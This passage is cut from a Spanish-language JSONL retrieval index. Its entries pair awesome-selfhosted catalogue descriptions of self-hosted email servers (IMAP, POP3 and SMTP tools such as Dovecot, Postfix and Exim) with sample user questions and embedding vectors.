-0.11021, 0.00125, -0.08019, 0.03528, -0.01956, 0.01991, -0.00732, -0.00062, 0.03204, 0.04027]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "con que herramienta puedo conectar un cliente de correo con un servidor Exchange desde fuera de la red?", "v": [-0.04977, 0.11083, -0.1856, -0.20625, -0.06777, -0.07816, -0.08156, 0.02189, 0.03381, -0.1147, -0.20275, -0.11366, 0.05043, -0.11947, 0.08603, 0.06221, 0.11606, -0.01963, 0.07203, -0.00033, 0.07469, 0.04318, -0.06061, -0.01966, -0.0304, 0.08514, 0.09127, -0.04893, -0.09275, 0.07077, 0.02822, -0.13357, 0.01111, 0.03203, 0.01803, -0.0762, 0.00749, 0.16513, 0.0206, -0.00074, 0.06942, -0.00481, -0.09834, 0.01588, 0.05827, 0.01696, 0.03278, -0.06924, 0.01815, 0.07864, -0.1234, -0.21373, -0.25061, -0.11285, -0.0355, -0.03688, 0.16933, -0.14547, 0.06351, -0.07865, -0.05874, 0.05523, -0.04812, -0.01234, 0.02377, -0.03219, -0.04336, -0.08716, -0.0964, 0.04085, -0.01257, 0.02297, -0.06206, -0.05225, 0.03808, 0.03372, 0.06224, -0.01673, 0.0086, 0.05111, 0.06018, 0.01554, -0.07459, 0.04317, -0.05446, -0.07746, 0.05255, -0.05079, 0.05316, -0.01515, 0.05839, 0.03147, -0.04913, 0.02309, 0.00837, -0.07901, 0.01562, -0.14441, -0.0414, 0.00567, 0.10331, 0.0917, -0.10398, 0.07251, 0.00471, 0.00692, 0.06496, -0.01955, 0.00646, 0.0193, 0.03316, -0.04622, 0.03941, -0.03728, -0.05234, -0.08146, -0.0108, -0.03579, 0.00513, 0.03499, -0.02516, -0.01324, -0.02832, 0.03036, -0.03868, -0.07352, -0.0478, 0.05371, 0.0048, -0.01783, -0.06174, -0.00144, -0.05446, -0.07498, -0.02491, 0.01946, 0.02636, -0.1398, -0.05128, -0.08408, -0.02197, -0.00105, -0.03869, -0.09337, 0.10161, 0.01567, 0.03206, -0.0771, -0.08835, 0.02958, 0.00483, -0.05196, -0.09169, 0.00822, -0.07586, 0.03694, 0.0373, -0.00515, -0.01138, 0.06984, -0.02231, 0.00843, 0.07081, 0.0517, 0.03539, -0.03552, -0.02772, 0.01874, 0.09135, 0.05931, -0.03648, 0.03689, 0.01652, -0.04044, -0.04863, -0.04013, -0.09212, -0.06396, 0.02094, -0.04242, -0.02368, -0.00278, -0.06185, -0.05526, -0.03419, -0.03164, -0.00692, -0.02097, 0.01226, 0.03583, -0.02891, 0.02583, -0.0211, 0.0051, 0.03782, -0.03883, -0.01114, -0.07042, -0.03528, -0.02152, -0.05379, -0.02199, -0.00058, -0.04358, -0.01068, 0.03621, -0.05753, 0.06022, -0.00184, 0.06122, 0.03521, -0.0348, 0.11809, -0.0336, -0.03563, -0.01284, 0.04705, -0.0615, 0.00997, 0.0013, 0.03855, -0.00508, 0.01492, -0.00867, -0.04201, -0.00121, -0.0118, -0.0076, 0.01896, 0.01008, 0.0031, -0.00581, -0.008, -0.02121, 0.04232, -0.02172, 0.06251, -0.05135, -0.07391, -0.0323, 0.01945, 0.05613, -0.02711, -0.016, 0.01438, -0.03864, -0.0662, -0.01689, -0.03424, -0.0629, -0.0263, -0.01399, 0.05796, -0.03796, 0.03476, -0.01544]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "cual es una opcion segura para instalar un servidor de correo IMAP y POP3?", "v": [-0.00827, 0.00353, -0.19689, -0.11472, -0.05002, -0.18017, 0.11569, -0.15336, -0.16275, -0.01268, -0.02189, -0.00886, 0.1734, -0.05143, -0.05882, 0.04799, 0.11453, -0.04201, 0.02445, 0.07702, 0.03298, 0.03885, -0.09397, -0.08108, -0.04656, 0.20275, -0.02128, 0.02844, -0.118, -0.13893, 0.03163, -0.04969, -0.01133, -0.03168, -0.07971, -0.04844, 0.01972, -0.00682, -0.00506, 0.05997, 0.03762, -0.01014, -0.06481, 0.11855, 0.04208, 0.05195, 0.08102, 0.00074, 0.04574, -0.06791, -0.08598, -0.07512, -0.08077, -0.09057, -0.04659, 0.04828, 0.08393, -0.13623, 0.08143, 0.05187, -0.11034, 0.07509, 0.00807, 0.0178, 0.07924, 0.02958, -0.05043, -0.04313, -0.10244, -0.03129, -0.02338, 0.03122, 0.04404, 0.04498, -0.00133, 0.04662, 0.01018, -0.06485, 0.05697, 0.06467, 0.07004, 0.01987, -0.03662, 0.11402, -0.09908, -0.12102, 0.01075, 0.00636, -0.02221, -0.05031, 0.10115, 0.02368, -0.05344, 0.17166, -0.02257, -0.15173, 0.03121, -0.01276, -0.10358, 0.07959, 0.01318, 0.00085, -0.07249, 0.12005, -0.01326, 0.02816, 0.07916, 0.03381, 0.11487, -0.04741, -0.00651, 0.10795, -0.0327, 0.01392, 0.04286, -0.09638, -0.02779, 0.01307, 0.05947, -0.02488, -0.01239, 0.0093, -0.00056, 0.05645, 0.05402, -0.03892, 0.05303, 0.05638, -0.01744, 0.0162, 0.06868, -0.05465, -0.009, -0.06039, -0.03985, -0.02572, -0.01684, -0.09007, -0.02868, -0.061, 0.02739, 0.02127, -0.00232, -0.06842, 0.09858, 0.03195, 0.03797, -0.0471, -0.02732, 0.00175, 0.01143, 0.01533, -0.03563, 0.02185, -0.04435, 0.0106, 0.08608, -0.09349, -0.00722, 0.08476, 0.0526, 0.06226, 0.06563, 0.05167, 0.01356, 0.02621, -0.01165, 0.02889, 0.04702, 0.0236, -0.01958, 0.01534, -0.02686, -0.04159, -0.01114, -0.09959, -0.05472, 0.00619, 0.04142, 0.00643, -0.04221, -0.0003, 0.00911, 0.02414, -0.0607, -0.08296, 0.00108, 0.00879, 0.00992, 0.00893, 0.05429, 0.02051, -0.06724, 0.00414, 0.03055, -0.09966, -0.00213, -0.10148, -0.08318, -0.05524, -0.08288, 0.00032, -0.00707, -0.08973, 0.04262, -0.03164, -0.04841, 0.04325, -0.00154, 0.04471, 0.02195, -0.04122, 0.11018, -0.01258, 0.00313, -0.03856, 0.06675, -0.00524, 0.01044, -0.00164, -0.01728, 0.00641, -0.02405, -0.01193, -0.02076, -0.03206, 0.00813, -0.03991, 0.05415, 0.00395, -0.02272, 0.09002, -0.00505, -0.04198, 0.08663, 0.02794, 0.06091, -0.04171, -0.04585, -0.09463, 0.04122, 0.10178, -0.01542, -0.05938, -0.01573, -0.05934, -0.05282, 0.00426, -0.06217, -0.07024, -0.04095, 0.01438, 0.02786, 0.0146, 0.06257, -0.05123]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "quΓ© programa es mejor para configurar un servidor de correo SMTP sencillo en casa?", "v": [-0.07795, 0.03047, -0.1677, -0.21776, -0.05707, -0.20898, -0.00169, -0.12908, 0.00615, 0.03219, -0.10835, 0.06555, 0.1611, -0.15124, 0.01121, -0.00639, 0.14472, -0.15973, 0.15627, 0.0635, 0.03242, 0.02786, -0.0082, -0.02831, -0.05562, 0.01937, 0.08637, -0.01386, -0.05814, -0.03203, 0.0826, -0.09983, 0.00804, -0.03105, 0.02368, -0.00245, 0.07722, 0.05872, -0.02044, 0.01699, 0.10122, -0.05758, 0.03559, 0.08672, 0.02699, -0.01663, 0.16161, -0.07908, 0.05226, -0.09669, -0.1322, -0.04973, -0.04347, -0.03562, -0.04319, 0.05354, 0.05977, -0.24735, 0.03129, -0.04853, -0.02962, 0.02316, 0.042, -0.00788, 0.01897, 0.01188, -0.02572, 0.00625, -0.03466, -0.07401, -0.05712, 0.0189, 0.02905, -0.05474, 0.0162, 0.08447, 0.01158, -0.06176, 0.07805, 0.06769, 0.05394, -0.0459, -0.08083, 0.06891, -0.10378, -0.06164, 0.00977, -0.04035, -0.01704, -0.0783, 0.03317, 0.01879, -0.03876, 0.11847, 0.04532, -0.0864, 0.14285, -0.00862, 0.00039, 0.05445, 0.0198, 0.00223, -0.11332, 0.17266, -0.03035, 0.06951, 0.09509, -0.03231, 0.01436, -0.0506, -0.05444, 0.01784, -0.06958, 0.00279, -0.06574, -0.09156, -0.0373, -0.03486, 0.04022, -0.02529, -0.09523, 0.00658, -0.00017, 0.02794, 0.01206, -0.03531, 0.11351, 0.00625, 0.02611, 0.10509, -0.05982, -0.08666, -0.05488, -0.01358, -0.00392, 0.03025, 0.00333, -0.06872, -0.05788, -0.0652, 0.03041, 0.05677, -0.04063, -0.06267, 0.0946, -0.02571, 0.03412, -0.04597, -0.0942, 0.10308, 0.03694, -0.00514, -0.05019, -0.06192, -0.04113, -0.00268, 0.02496, -0.07421, -0.04632, 0.05267, -0.04133, 0.01682, -0.01413, -0.02322, 0.00786, 0.02959, 0.00255, 0.07309, 0.04667, 0.06398, -0.0254, 0.07068, 0.01972, -0.04922, -0.03726, -0.06259, 0.01675, -0.0254, -0.02146, 0.02938, -0.08222, 0.03931, 0.06066, -0.00842, -0.01698, -0.01665, -0.01552, 0.05175, 0.00903, -0.07124, -0.03688, 0.00144, -0.02786, 0.04126, 0.01994, -0.06113, -0.03827, -0.08217, -0.0236, -0.01025, -0.0773, -0.07458, 0.05303, -0.04619, 0.03338, 0.02896, -0.04272, 0.0157, 0.04661, 0.08757, -0.01491, -0.0419, 0.06217, -0.01172, 0.0026, 0.03781, 0.03132, 0.02729, 0.08648, 0.055, 0.042, 0.00045, -0.03132, -0.02443, -0.02751, -0.01163, 0.00076, -0.0393, 0.07381, 0.02347, -0.05992, -0.04628, 0.03268, -0.00385, 0.05862, -0.0144, -0.0097, -0.01116, 0.01021, -0.02753, -0.00235, 0.05247, -0.00184, -0.0242, -0.04303, -0.01551, -0.07117, -0.00561, -0.01562, 0.03425, -0.0198, -0.05335, 0.03154, -0.02537, -0.01396, 0.01393]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "con quΓ© herramienta puedo montar una soluciΓ³n completa de gestiΓ³n de correos que no use base de datos?", "v": [-0.01254, 0.151, -0.1461, -0.16544, -0.02259, -0.07338, -0.00702, -0.03312, -0.18577, -0.11313, -0.11412, -0.08998, 0.07311, -0.10418, 0.10619, -0.02501, 0.09943, -0.08463, -0.08855, -0.02413, -0.01694, -0.09693, -0.09714, -0.05975, -0.1695, 0.07234, 0.07566, -0.06844, -0.12399, 0.11294, 0.05163, -0.03612, -0.05359, 0.03858, -0.03514, 0.0281, -0.01324, 0.06043, -0.05681, -0.03018, -0.02499, -0.04464, -0.10196, 0.08765, 0.03362, -0.03321, -0.00127, -0.01852, -0.00939, -0.01863, -0.03552, -0.13833, -0.15233, -0.04608, -0.0325, -0.1157, 0.20018, -0.06529, 0.1385, -0.06731, -0.11604, 0.07866, 0.04059, 0.06605, -0.00639, -0.04761, 0.04472, -0.09842, -0.1535, 0.07116, 0.0086, 0.0266, -0.04374, -0.01014, -0.00772, -0.01727, 0.068, 0.09601, -0.06522, 0.08433, 0.07018, -0.11347, -0.10404, 0.01339, -0.09118, -0.08348, 0.07596, -0.08301, -0.01458, -0.11709, -0.00797, -0.00216, -0.05194, 0.00572, -0.00495, -0.03495, -0.00333, -0.01697, -0.05141, 0.06239, 0.04914, 0.07432, -0.09475, 0.10297, -0.00772, 0.02744, 0.0516, -0.03718, -0.00525, -0.01438, -0.06795, -0.02203, 0.01402, -0.0303, -0.09084, -0.0825, -0.01175, -0.01453, -0.04853, -0.03974, -0.01337, 0.04001, 0.06582, -0.01491, 0.07753, -0.0674, 0.0364, 0.09784, -0.02853, 0.03948, -0.07222, -0.08931, -0.1226, -0.01073, 0.05337, 0.01926, -0.08312, -0.09187, -0.00933, -0.04549, -0.02945, 0.05616, -0.0411, -0.06517, 0.03922, -0.01411, 0.01386, -0.03648, -0.11109, -0.0134, 0.07011, -0.01144, 0.05427, 0.05771, -0.11737, 0.0361, 0.04444, -0.02735, -0.03366, 0.02669, -0.04342, 0.0078, -0.01591, 0.11655, 0.00036, -0.12613, 0.04586, 0.06658, -0.01974, 0.07901, -0.02742, 0.05917, 0.04958, -0.04707, 0.03261, -0.05842, -0.05987, -0.02987, -0.02088, -0.02953, -0.00404, -0.00057, -0.01868, 0.00744, -0.02125, -0.04569, 0.05113, -0.02963, 0.00276, 0.02554, -0.01558, 0.02884, 0.05409, -0.02623, 0.03659, -0.021, -0.03616, -0.05126, 0.0388, -0.02544, -0.0545, 0.02121, -0.02683, 0.00392, -0.01315, 0.03879, -0.10187, 0.0032, 0.00555, 0.01741, 0.03254, -0.03713, 0.04888, -0.03289, -0.02998, -0.01728, 0.02863, -0.00861, -0.00521, 0.00026, -0.03811, 0.0586, 0.04183, -0.02938, -0.04149, 0.02228, 0.03749, 0.01744, 0.03389, 0.01093, 0.0385, 0.00253, -0.00404, -0.01435, 0.04128, -0.04298, 0.03705, -0.07661, -0.02429, -0.03455, 0.03051, 0.07106, -0.01252, 0.01191, -0.00825, -0.05256, -0.08637, 0.02001, -0.04105, -0.05221, -0.03515, -0.02591, 0.01862, -0.035, 0.00206, -0.03773]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: chasquid β€” SMTP (email) server with a focus on simplicity, security, and ease of operation [Apache-2.0, Go]. Courier MTA β€” Fast, scalable, enterprise mail/groupware server providing ESMTP, IMAP, POP3, webmail, mailing list, basic web-based calendaring and scheduling services [GPL-3.0, C/deb]. DragonFly β€” A small MTA for home and office use. Works on Linux and FreeBSD [BSD-3-Clause, C]. EmailRelay β€” A small and easy to configure SMTP and POP3 server for Windows and Linux [GPL-3.0, C++]. Exim β€” Message transfer agent (MTA) developed at the University of Cambridge [GPL-3.0, C/deb]. Haraka β€” Fast, highly extensible, and event driven SMTP server [MIT, Nodejs]. OpenSMTPD β€” Secure SMTP server implementation from the OpenBSD project [ISC, C/deb]. OpenTrashmail β€” Complete trashmail solution that exposes an SMTP server and has a web interface to manage received emails. Works with multiple and wildcard domains and is fully file based (no database needed). Includes RSS feeds and JSON API [Apache-2.0, Python/PHP/Docker].", "indexar": "cuΓ‘l es la alternativa mΓ‘s rΓ‘pida y escalable a Exim para un servidor empresarial propio?", "v": [-0.08395, 0.00906, -0.0909, -0.07648, -0.01335, -0.11695, 0.04547, -0.20805, -0.1105, -0.06665, -0.04547, -0.07398, -0.02756, -0.00904, 0.07954, 0.06431, 0.10164, -0.10312, 0.05453, -0.00087, 0.01596, 0.02027, -0.06572, -0.0044, -0.08907, 0.00752, -0.16128, 0.03175, -0.0914, 0.0174, 0.08446, 0.09538, 0.07727, -0.09916, 0.07081, 0.03717, 0.12999, 0.05461, -0.00671, -0.06949, 0.08424, -0.10579, -0.06077, -0.0179, 0.0518, -0.04458, -0.04719, 0.01584, 0.01573, 0.01006, -0.16619, -0.0553, -0.09159, -0.09702, 0.07432, -0.01429, 0.05486, -0.1328, 0.0234, -0.03702, -0.02617, -0.02299, -0.05246, -0.06965, 0.01815, -0.02265, -0.14549, -0.04109, -0.10421, -0.09491, -0.13274, -0.05742, -0.0039, -0.07099, 0.05263, 0.00963, 0.02574, 0.06089, 0.02997, 0.11797, 0.10698, -0.05801, -0.07367, 0.0758, -0.04709, -0.10471, -0.04273, -0.04847, 0.03036, 0.06078, 0.08664, 0.04245, -0.03446, 0.019, -0.02406, -0.13263, 0.10174, 0.0429, -0.06149, 0.05064, 0.04181, 0.03364, -0.1238, -0.01355, 0.00176, 0.04748, -0.02784, -0.03692, -0.09677, -0.0394, 0.02789, 0.02576, -0.01379, 0.04116, -0.07141, -0.12586, -0.0431, -0.04457, -0.08857, 0.04432, -0.03412, -0.08286, 0.10102, 0.01916, 0.00593, -0.0967, 0.06422, 0.03431, 0.07932, -0.08972, -0.01318, -0.08526, -0.01241, -0.04224, -0.09396, 0.0022, 0.02796, -0.01434, 0.05401, -0.10195, 0.01623, 0.02794, -0.01121, -0.01221, 0.08949, 0.00212, 0.07731, -0.07294, 0.00153, 0.09762, -0.03128, -0.00193, -0.10035, 0.08902, -0.12634, -0.08676, -0.01514, -0.04623, -0.072, 0.11049, 0.05049, -0.02531, 0.02631, 0.088, 0.00261, -0.07101, -0.05014, 0.01793, -0.00694, 0.05892, -0.05663, 0.0498, -0.03533, -0.07938, 0.09004, -0.01407, -0.05033, -0.10849, 0.01518, -0.00421, -0.03726, -0.02775, -0.02595, 0.00247, -0.02591, -0.08382, 0.04144, 0.04884, 0.00155, 0.0574, -0.02615, 0.02101, -0.03658, -0.04919, 0.00095, -0.08383, 0.00694, -0.07437, -0.01408, -0.03169, -0.05841, -0.11737, -0.08738, -0.04145, 0.03713, -0.0191, -0.07273, 0.05199, 0.02984, 0.06145, 0.00574, 0.01216, 0.07114, 0.01628, -0.02641, 0.00483, 0.03032, -0.03595, 0.04232, -0.00297, 0.00469, -0.00858, 0.04233, 0.02076, -0.04268, 0.08278, -0.00508, 0.00174, -0.03677, -0.04735, -0.00694, 0.05794, -0.01605, 0.00902, -0.00035, 0.01073, 0.036, -0.03547, 0.02771, -0.03509, 0.07426, 0.05528, -0.06406, -0.00428, -0.09097, -0.01126, -0.03377, 0.03122, -0.06054, -0.02318, -0.04506, -0.03397, -0.01914, 0.00297, -0.01078, 0.02396]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "que programa puedo usar para gestionar el envΓ­o de correos", "v": [0.00274, 0.11898, -0.12746, -0.17428, 0.02827, -0.04344, 0.05707, -0.02577, -0.11602, -0.12797, -0.08587, -0.06331, 0.09854, -0.07731, -0.00324, -0.04088, 0.17275, 0.05011, -0.00422, 0.02383, 0.04875, 0.02258, -0.09214, -0.064, -0.08577, 0.10142, 0.07045, -0.08452, 0.02685, 0.02238, 0.03854, -0.06615, 0.04417, -0.08873, 0.0796, 0.06647, 0.0302, 0.08467, 0.01859, 0.0347, 0.07042, 0.02034, -0.1334, 0.02029, 0.01199, -0.04893, 0.08498, -0.01533, -0.04219, -0.02729, -0.04625, -0.09374, -0.11295, -0.01191, -0.00425, -0.03863, 0.07704, -0.14223, 0.02408, -0.04613, 0.05473, 0.07505, 0.07413, 0.08465, -0.03333, -0.08404, 0.07212, -0.07226, -0.24555, -0.01115, 0.01914, 0.02753, -0.03755, 0.02417, -0.00388, 0.03154, -0.01302, 0.08449, -0.01965, 0.05369, 0.02602, -0.08014, 0.02698, 0.01414, -0.08007, -0.10343, 0.02565, -0.08784, -0.05176, -0.11279, -0.02984, -0.05471, -0.09314, 0.02224, 0.02738, -0.00309, -0.08568, -0.03562, -0.02152, 0.12573, 0.03537, 0.04868, -0.07942, 0.13608, -0.0811, 0.09759, 0.06309, -0.04699, 0.10523, 0.02364, -0.115, -0.06934, 0.00943, -0.025, -0.09942, -0.04886, -0.00601, -0.07186, 0.04276, -0.0424, -0.1009, 0.0123, 0.02139, 0.05467, 0.17451, -0.08125, 0.01512, 0.04157, -0.02161, 0.10339, -0.0999, -0.05673, -0.0244, -0.02402, -0.04665, -0.03983, -0.09428, -0.04872, -0.00127, -0.03987, -0.03997, 0.10995, -0.02439, -0.00932, 0.04545, 0.0079, -0.05323, -0.10498, -0.07025, -0.01203, 0.1006, -0.06164, 0.01498, 0.01482, -0.03368, 0.0077, 0.06125, -0.08512, -0.04428, 0.00621, -0.06973, 0.05236, -0.02801, 0.07633, 0.0209, -0.06184, 0.01662, 0.07274, -0.04649, 0.09728, -0.03904, 0.05916, 0.04274, -0.01301, 0.01121, -0.07095, 0.00506, -0.02258, 0.01785, 0.01461, -0.04236, 0.10733, 0.03563, 0.01786, -0.07171, 0.00108, -0.02283, 0.06858, 0.02254, 0.03837, -0.03094, 0.06783, 0.04533, 0.0265, -0.02731, -0.00501, -0.06441, -0.05182, -0.04092, -0.0349, -0.04192, -0.00405, -0.003, -0.02005, 0.00132, 0.06206, -0.10234, 0.04252, 0.02092, 0.09391, 0.01626, -0.06852, 0.05864, -0.02357, -0.06128, -0.02082, 0.0153, -0.00013, 0.02686, 0.02037, -0.02363, 0.01477, 0.00533, -0.00342, -0.03635, -0.04199, 0.03699, 0.05602, 0.04297, 0.04665, -0.00631, 0.06206, -0.0295, -0.01708, 0.05614, -0.0198, 0.07919, -0.07313, -0.01503, -0.05139, -0.00438, 0.06682, -0.02791, 0.02624, -0.02119, -0.01513, -0.11774, 0.03126, -0.0659, 0.03406, -0.01496, 0.04114, 0.00731, -0.03119, 0.03525, 0.02813]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "cual es una alternativa libre a sendmail que sea fΓ‘cil de administrar", "v": [-0.03832, 0.14654, -0.07451, -0.00736, -0.05186, -0.01568, -0.07582, -0.10226, -0.20256, -0.06043, -0.1184, -0.20772, 0.07717, -0.03743, 0.13085, -0.0303, 0.12919, -0.01538, 0.07579, 0.01348, 0.04041, 0.08898, -0.11041, -0.08478, -0.06682, -0.02431, 0.08206, -0.03855, -0.05738, 0.00692, 0.07081, -0.05681, 0.05208, -0.03219, 0.04989, 0.10621, 0.11044, 0.09469, 0.01792, 0.0374, -0.01406, -0.0626, -0.06107, 0.09566, -0.0359, -0.06395, -0.00892, -0.0005, 0.07375, 0.00237, -0.05932, -0.10402, -0.08068, -0.00689, 0.0723, 0.05641, 0.13087, -0.1579, -0.0327, -0.07346, -0.09463, 0.09339, 0.04096, 0.09849, -0.03528, -0.00214, -0.0122, -0.07147, -0.2005, 0.0708, 0.1254, -0.03569, -0.02229, 0.01581, -0.09361, 0.04726, -0.10357, 0.06314, -0.00866, 0.04776, 0.03574, -0.1142, 0.0048, 0.02129, -0.06758, -0.17818, 0.04328, -0.12754, -0.03802, -0.01956, 0.06783, -0.05149, -0.04083, 0.10952, -0.0136, -0.03593, -0.00747, -0.0038, -0.01503, 0.08671, 0.08372, 0.0287, -0.12865, 0.0594, -0.0233, -0.0283, 0.01595, -0.01657, 0.02002, 0.05801, -0.01406, -0.0262, 0.02844, -0.00522, 0.00472, -0.0704, -0.06074, -0.02624, -0.01641, -0.01226, -0.06947, -0.05231, -0.01056, -0.0117, 0.08437, -0.0312, 0.03123, 0.02655, 0.00145, 0.1006, 0.00529, -0.023, -0.09797, -0.05418, -0.04623, 0.00695, -0.03979, -0.08172, 0.03982, -0.02642, -0.04999, 0.07325, -0.01541, -0.08162, -0.02354, -0.00606, 0.01904, -0.04799, -0.02095, -0.01675, -0.03952, -0.01716, -0.00829, 0.11867, -0.07708, -0.01746, -0.00143, -0.037, -0.03571, 0.08266, 0.01278, 0.00354, -0.0, 0.09315, 0.00866, -0.10088, -0.0138, -0.01338, -0.07488, 0.02251, -0.00689, 0.1, 0.01516, -0.02049, 0.04943, -0.07803, 0.00376, -0.08778, 0.03512, 0.01233, 0.01575, 0.06643, -0.06178, 0.01647, -0.05568, -0.04621, -0.00981, 0.03929, 0.00838, 0.08035, 0.03144, 0.05427, -0.04893, -0.03166, -0.03096, 0.01008, -0.03329, -0.13997, -0.04968, -0.01248, -0.03371, -0.04128, 0.00254, -0.03007, -0.02185, 0.00192, -0.08036, 0.09284, 0.00733, 0.07084, 0.04787, 0.01578, 0.04898, 0.02681, -0.02988, -0.01595, 0.01419, -0.0354, 0.00614, 0.02929, 0.01659, 0.00972, 0.00845, -0.0704, -0.00347, 0.05959, 0.00211, 0.11958, 0.00164, 0.03315, 0.015, 0.02622, -0.01098, -0.0125, 0.01714, -0.0286, 0.06208, -0.05056, 0.02272, -0.00874, 0.06918, 0.07289, -0.02633, 0.05829, -0.01496, -0.01825, -0.11317, 0.0482, -0.11123, -0.03921, -0.06027, 0.0201, 0.01541, 0.00574, 0.04551, -0.01482]} +{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Transfer Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Transfer Agents", "tema": "communication - email - mail transfer agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Transfer Agents: Postfix β€” Fast, easy to administer, and secure Sendmail replacement [IPL-1.0, C/deb]. Sendmail β€” Message transfer agent (MTA) [Sendmail, C/deb].", "indexar": "con que herramienta puedo reemplazar sendmail en mi servidor", "v": [0.03205, 0.12038, -0.17621, -0.15836, -0.01973, -0.10668, -0.11162, -0.08493, 0.00915, -0.0602, -0.13477, -0.03579, 0.16478, -0.13966, 0.04416, 0.12493, 0.18792, -0.0568, 0.00046, 0.0364, 0.06287, 0.06951, -0.05218, -0.04513, -0.08752, 0.10561, 0.07671, -0.03022, -0.10205, 0.00444, 0.03039, -0.10286, -0.00501, -0.05091, -0.01403, -0.03439, 0.02985, 0.13152, -0.06714, 0.03071, 0.04495, 0.01135, -0.05195, 0.02313, -0.02696, -0.03016, 0.04236, -0.02686, 0.06542, 0.0611, -0.08708, -0.22101, -0.14816, -0.02786, -0.02162, -0.01516, 0.20795, -0.20234, 0.05236, -0.12884, -0.12247, 0.02407, -0.05437, 